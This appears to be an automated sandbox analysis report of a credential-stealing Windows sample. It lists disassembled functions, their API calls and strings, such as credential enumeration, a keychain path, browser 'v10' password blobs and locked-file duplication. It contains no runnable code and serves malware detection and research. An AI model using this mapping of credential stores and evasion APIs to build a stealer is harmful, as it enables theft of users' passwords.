                                                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                          • API String ID: 2745753283-3798722523
                                                                                                                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 482 40bb30-40bb3a 474->482 475->472 477 40b9dd-40ba25 call 447280 call 447960 475->477 477->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 477->492 485 40bb3c 482->485 486 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 482->486 483->440 485->486 486->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                                          • API String ID: 170802307-2783969131
                                                                                                                                                                                                          • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 513 40e304-40e30f call 406e8f 511->513 516 40e314-40e316 513->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                          • API String ID: 3073804840-2252543386
                                                                                                                                                                                                          • Opcode ID: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-409248 call 40b273 call 438552 563->569 574 409383-4093ab call 40b273 call 438552 569->574 575 40924e-409258 call 4251c4 569->575 587 4093b1 574->587 588 4094ff-409502 call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 594 409507-40950b 588->594 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 594->568 597 40950d-409511 594->597 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 602 4094f7-4094fa call 424f26 599->602 601->568 602->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 616 4093e4-4093fb call 4253af * 2 614->616 617 4092bc 615->617 618 4092be-4092e3 memcpy memcmp 615->618 616->602 628 409401-409403 616->628 617->618 619 409333-409345 memcmp 618->619 620 4092e5-4092ec 618->620 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->602 629 409409-40941b memcmp 628->629 629->602 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->602 634 4094b8-4094ed memcpy * 2 631->634 632->602 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->602
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                                                          • Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                                          • API String ID: 327780389-2689659898
                                                                                                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
